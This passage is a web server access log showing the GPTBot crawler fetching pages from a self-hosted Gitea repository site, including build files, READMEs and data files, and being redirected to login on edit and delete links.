"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11312] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12138] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21639] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:30:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" +[17/Feb/2026:17:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode" +[17/Feb/2026:17:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" +[17/Feb/2026:17:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/.vscode" +[17/Feb/2026:17:30:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:17:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build" +[17/Feb/2026:17:30:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:17:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build" +[17/Feb/2026:17:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11475] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:17:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15434] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:17:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:17:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14529] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:17:30:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" +[17/Feb/2026:17:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 12185] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12481] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11667] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 9779] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 9773] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 11081] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18288] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:30:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9783] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher" +[17/Feb/2026:17:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 